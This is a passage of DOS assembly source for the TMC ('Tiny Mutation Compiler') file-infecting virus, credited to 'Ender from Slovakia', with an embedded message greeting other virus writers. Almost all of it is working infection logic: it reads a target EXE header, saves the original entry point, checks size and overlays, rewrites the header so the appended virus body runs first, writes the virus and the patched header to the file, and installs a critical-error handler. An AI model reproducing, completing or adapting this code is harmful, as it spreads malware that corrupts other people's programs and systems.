        xor cx,cx ; CX = high-order word of offset f...
        db 02h ; Two bytes instruction
        xor dx,dx ; DX = low-order word of offset fi...
        db 02h ; Two bytes instruction
        int 21h
        db 01110010b+10000000b ; Error? Jump to close_file
        dw 0fah ; Pointer to close_file
        db 02h ; Two bytes instruction
        mov ah,3fh ; Read from file
        db 03h ; Three bytes instruction
        mov cx,18h ; Read twenty-four bytes
        db 03h ; Three bytes instruction
        mov dx,1234h ; DX = offset of exe_header
        db 11101101b ; Data reference
        dw 138fh ; Pointer to exe_header
        db 02h ; Two bytes instruction
        int 21h
        db 01110010b+10000000b ; Error? Jump to close_file
        dw 0fah ; Pointer to close_file
        db 03h ; Three bytes instruction
        mov si,1234h ; SI = offset of exe_header
        db 11101101b ; Data reference
        dw 138fh ; Pointer to exe_header
        db 02h ; Two bytes instruction
        xor ax,ax ; Zero AX
        db 04h ; Four bytes instruction
        cmp [si+0ch],0ffffh ; Maximum paragraphs to allocate ...?
        db 01110100b+10000000b ; Equal? Jump to maximum_mem
        dw 1399h ; Pointer to maximum_mem
        db 03h ; Three bytes instruction
        mov ax,[si+04h] ; AX = total number of 512-byte pa...
        db 01h ; One byte instruction
        inc ax ; Increase total number of 512-byt...
; TMC table entries, one statement per line: `db n` gives the length of the
; instruction that follows; CALL / JMP / Jcc / data-reference markers are
; followed by a 16-bit block identification rather than a real offset.
; SI points at the 18h-byte copy of the EXE header throughout. Header fields
; as used by this code: +02h bytes in last page, +04h page count, +08h header
; size in paragraphs, +0ah minimum and +0ch maximum extra paragraphs,
; +0eh SS, +10h SP, +14h IP, +16h CS.
;
; The entries up to the first "End of block" finish infect_exe: the page
; count in AX is converted to paragraphs (SHL by 5 multiplies by 32, since a
; 512-byte page is 32 paragraphs) and the header size is subtracted.
        db 02h ; Two bytes instruction
        mov cl,05h ; Multiply by thirty-two (pages to paragraphs)
        db 02h ; Two bytes instruction
        shl ax,cl ; AX = size of image in paragraphs
        db 03h ; Three bytes instruction
        sub ax,[si+08h] ; Subtract header size in paragrap...
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 1399h ; Pointer to maximum_mem
        db 11101111b ; End of block

; maximum_mem: records what the original program expects (memory size, SS,
; SP, IP, CS) in the per-host data cells, then decides from probability_
; whether to compute an "incorrect IP".
maximum_mem db 11101110b ; Beginning of block
        dw 1399h ; Block identification of maximum_mem
        db 03h ; Three bytes instruction
        add ax,[si+0ch] ; Add maximum paragraphs to alloca...
        db 03h ; Three bytes instruction
        mov ds:[1234h],ax ; Store size of memory block in pa...
        db 11101101b ; Data reference
        dw 1395h ; Pointer to mcb_size__
        db 03h ; Three bytes instruction
        mov ax,[si+0eh] ; AX = initial SS relative to star...
        db 03h ; Three bytes instruction
        mov ds:[1234h],ax ; Store initial SS relative to sta...
        db 11101101b ; Data reference
        dw 138ah ; Pointer to initial_ss_
        db 03h ; Three bytes instruction
        mov ax,[si+10h] ; AX = initial SP
        db 03h ; Three bytes instruction
        mov ds:[1234h],ax ; Store initial SP
        db 11101101b ; Data reference
        dw 138ch ; Pointer to initial_sp_
        db 03h ; Three bytes instruction
        mov ax,[si+14h] ; AX = initial IP
        db 03h ; Three bytes instruction
        mov ds:[1234h],ax ; Store initial IP
        db 11101101b ; Data reference
        dw 138bh ; Pointer to initial_ip_
        db 03h ; Three bytes instruction
        mov ax,[si+16h] ; AX = initial CS relative to star...
        db 03h ; Three bytes instruction
        mov ds:[1234h],ax ; Store initial CS relative to sta...
        db 11101101b ; Data reference
        dw 1389h ; Pointer to initial_cs_
; The incorrect IP is only computed when probability_ is not above 14h.
        db 03h ; Three bytes instruction
        mov ax,14h ; AX = probability of storing inco...
        db 04h ; Four bytes instruction
        cmp ds:[1234h],ax ; Store incorrect IP?
        db 11101101b ; Data reference
        dw 0bech ; Pointer to probability_
        db 01110111b+10000000b ; Above? Jump to set_file_pos
        dw 1775h ; Pointer to set_file_pos
        db 01h ; One byte instruction
        push bp ; Save BP at stack
        db 01h ; One byte instruction
        push ds ; Save DS at stack
        db 01h ; One byte instruction
        pop es ; Load ES from stack (DS)
        db 03h ; Three bytes instruction
        mov bp,40h ; Random number within sixty-four
        db 11101000b ; CALL imm16 (opcode 0e8h)
        dw 0bd5h ; Pointer to rnd_in_rang
        db 01h ; One byte instruction
        pop bp ; Load BP from stack
        db 03h ; Three bytes instruction
        add ax,[si+14h] ; Add initial IP to random number ...
        db 03h ; Three bytes instruction
        mov ds:[1234h],ax ; Store incorrect IP
        db 11101101b ; Data reference
        dw 1773h ; Pointer to incorrec_ip
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 1775h ; Pointer to set_file_pos
        db 11101111b ; End of block

; set_file_pos: rewrites the in-memory EXE header for the appended body.
; Files are skipped when the high word of the size is above 6 or when the
; size on disk does not match the header's page count (data beyond the load
; image, e.g. an internal overlay).
set_file_pos db 11101110b ; Beginning of block
        dw 1775h ; Block identification of set_file_pos
        db 03h ; Three bytes instruction
        mov ax,4202h ; Set current file position (EOF)
        db 02h ; Two bytes instruction
        xor cx,cx ; CX = high-order word of offset f...
        db 02h ; Two bytes instruction
        xor dx,dx ; DX = low-order word of offset f...
        db 02h ; Two bytes instruction
        int 21h
        db 01110010b+10000000b ; Error? Jump to close_file
        dw 0fah ; Pointer to close_file
        db 03h ; Three bytes instruction
        cmp dx,06h ; Filesize too large? (DX = high-order word of file size)
        db 01110111b+10000000b ; Above? Jump to close_file
        dw 0fah ; Pointer to close_file
        db 01h ; One byte instruction
        push ax ; Save AX at stack
        db 01h ; One byte instruction
        push dx ; Save DX at stack
        db 03h ; Three bytes instruction
        mov cx,200h ; Divide by pages
        db 02h ; Two bytes instruction
        div cx ; AX = filesize in pages, DX = bytes in last page
        db 01h ; One byte instruction
        inc ax ; Increase total number of 512-byt...
        db 03h ; Three bytes instruction
        cmp [si+04h],ax ; Internal overlay?
        db 01h ; One byte instruction
        pop dx ; Load DX from stack (POP leaves the flags of the CMP intact)
        db 01h ; One byte instruction
        pop ax ; Load AX from stack
        db 01110101b+10000000b ; Not equal? Jump to close_file
        dw 0fah ; Pointer to close_file
        db 01h ; One byte instruction
        push ax ; Save AX at stack
        db 01h ; One byte instruction
        push dx ; Save DX at stack
        db 05h ; Five bytes instruction
        mov [si+0ch],0ffffh ; Store maximum paragraphs to allo...
        db 05h ; Five bytes instruction
        mov [si+10h],7ffeh ; Store initial SP
        db 05h ; Five bytes instruction
        mov word ptr [si+14h],00h ; Store initial IP (zero)
        db 03h ; Three bytes instruction
        mov cx,10h ; Divide by paragraphs
        db 02h ; Two bytes instruction
        div cx ; AX = filesize in paragraphs, DX = remainder
        db 03h ; Three bytes instruction
        sub ax,[si+08h] ; Subtract header size in paragrap...
        db 01h ; One byte instruction
        inc ax ; Increase initial CS/SS relative ...
        db 03h ; Three bytes instruction
        mov [si+0eh],ax ; Store initial SS relative to sta...
        db 03h ; Three bytes instruction
        mov [si+16h],ax ; Store initial CS relative to sta...
; DI = memory the original header asked for as a minimum:
; (pages + 1) * 32 - header paragraphs + minimum extra paragraphs.
        db 03h ; Three bytes instruction
        mov ax,[si+04h] ; AX = total number of 512-byte pa...
        db 01h ; One byte instruction
        inc ax ; Increase total number of 512-byt...
        db 02h ; Two bytes instruction
        mov cl,05h ; Multiply by thirty-two (pages to paragraphs)
        db 02h ; Two bytes instruction
        shl ax,cl ; AX = size of image in paragraphs
        db 03h ; Three bytes instruction
        sub ax,[si+08h] ; Subtract header size in paragrap...
        db 03h ; Three bytes instruction
        add ax,[si+0ah] ; Add minimum paragraphs to allocate
        db 02h ; Two bytes instruction
        mov di,ax ; DI = minimum paragraphs to alloc...
; The saved file size is popped with the words swapped into CX:DX (high:low),
; rounded up to the next paragraph boundary and used as the seek position.
        db 01h ; One byte instruction
        pop cx ; Load CX from stack (DX)
        db 01h ; One byte instruction
        pop dx ; Load DX from stack (AX)
        db 03h ; Three bytes instruction
        and dx,1111111111110000b ; Clear the low four bits of the offset
        db 03h ; Three bytes instruction
        add dx,10h ; DX = low-order word of offset fr...
        db 03h ; Three bytes instruction
        adc cx,00h ; CX = high-order word of offset f...
        db 03h ; Three bytes instruction
        mov ax,4200h ; Set current file position (SOF)
        db 02h ; Two bytes instruction
        int 21h
        db 01110010b+10000000b ; Error? Jump to close_file
        dw 0fah ; Pointer to close_file
; New size = seek position + body length; the header's page count and
; last-page byte count are recomputed from it.
        db 03h ; Three bytes instruction
        add ax,1234h ; AX = length of virus
        db 11101101b ; Data reference
        dw 66h ; Pointer to virus_end
        db 03h ; Three bytes instruction
        adc dx,00h ; Convert to 32-bit
        db 03h ; Three bytes instruction
        mov cx,200h ; Divide by pages
        db 02h ; Two bytes instruction
        div cx ; AX = filesize in pages, DX = bytes in last page
        db 03h ; Three bytes instruction
        mov [si+02h],dx ; Store number of bytes in last 51...
        db 01h ; One byte instruction
        inc ax ; Increase total number of 512-byt...
        db 03h ; Three bytes instruction
        mov [si+04h],ax ; Store total number of 512-byte p...
        db 05h ; Five bytes instruction
        mov [si+0ah],800h ; Store minimum paragraphs of memo...
        db 01h ; One byte instruction
        inc ax ; Increase total number of 512-byte pages
        db 02h ; Two bytes instruction
        mov cl,05h ; Multiply by thirty-two (pages to paragraphs)
        db 02h ; Two bytes instruction
        shl ax,cl ; AX = size of image in paragraphs
        db 03h ; Three bytes instruction
        sub ax,[si+08h] ; Subtract header size in paragrap...
        db 03h ; Three bytes instruction
        add ax,[si+0ah] ; Add minimum paragraphs to allocate
        db 03h ; Three bytes instruction
        mov ds:[1234h],ax ; Store new size in paragraphs
        db 11101101b ; Data reference
        dw 1393h ; Pointer to new_mcb_siz
; If the original program needed more memory than the new header requests,
; the difference is added to the header's minimum allocation.
        db 02h ; Two bytes instruction
        sub di,ax ; DI = additional minimum paragrap...
        db 01110110b+10000000b ; Below or equal? Jump to dont_add_mem
        dw 1396h ; Pointer to dont_add_mem
        db 03h ; Three bytes instruction
        add [si+0ah],di ; Add additional minimum paragraph...
        db 11101001b ; JMP imm16 (opcode 0e9h)
        dw 1396h ; Pointer to dont_add_mem
        db 11101111b ; End of block

; dont_add_mem: the body of this block follows in the next entries.
dont_add_mem db 11101110b ; Beginning of block
        dw 1396h ; Block identification of dont_add_mem
db 06h ; Six bytes instruction mov word ptr ds:[01h],00h db 02h ; Two bytes instruction mov ah,40h ; Write to file db 02h ; Two bytes instruction xor dx,dx ; Zero DX db 03h ; Three bytes instruction mov cx,1234h ; CX = length of virus db 11101101b ; Data reference dw 66h ; Pointer to virus_end db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 02h ; Two bytes instruction xor cx,cx ; CX = high-order word of offset f... db 02h ; Two bytes instruction xor dx,dx ; DX = low-order word of offset f... db 03h ; Three bytes instruction mov ax,4200h ; Set current file position (SOF) db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 02h ; Two bytes instruction mov ah,40h ; Write to file db 02h ; Two bytes instruction mov dx,si ; DX = offset of exe_header db 03h ; Three bytes instruction mov cx,18h ; Write twenty-four bytes db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? 
Jump to close_file dw 0fah ; Pointer to close_file db 11101001b ; JMP imm16 (opcode 0e9h) dw 138eh ; Pointer to set_file_inf db 11101111b ; End of block int24_virus db 11101110b ; Beginning of block dw 1770h ; Block identification of int24_virus db 02h ; Two bytes instruction mov al,03h ; Fail system call in progress db 01h ; One byte instruction iret ; Interrupt return db 11101111b ; End of block exe_header db 11101110b ; Beginning of block dw 138fh ; Block identification of exe_header db 18h+10h ; Twenty-four bytes data db 18h dup(00h) ; EXE header db 11101111b ; End of block file_time db 11101110b ; Beginning of block dw 12ch ; Block identification of file_time db 02h+10h ; Two bytes data dw 00h ; File time db 11101111b ; End of block file_date db 11101110b ; Beginning of block dw 12dh ; Block identification of file_date db 02h+10h ; Two bytes data dw 00h ; File date db 11101111b ; End of block message db 11101110b ; Beginning of block dw 2328h ; Block identification of message db (message_end-messag_begin)+10h messag_begin db 0dh,0ah db 0dh,0ah db 'þ TMC 1.0 by Ender from Slovakia þ',0dh,0ah db 'Welcome to the Tiny Mutation Compiler!',0dh,0ah db 'Dis is level 42.',0dh,0ah db 'Greetings to virus makers: Dark Avenger, Vyvojar, Hell Angel',0dh,0ah db 'Personal greetings: K. K., Dark Punisher',0dh,0ah db 0dh,0ah message_end: db 11101111b ; End of block db 00h ; End of table code_end: table_end: end code_begin ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[tmc_b.asm]ÄÄÄ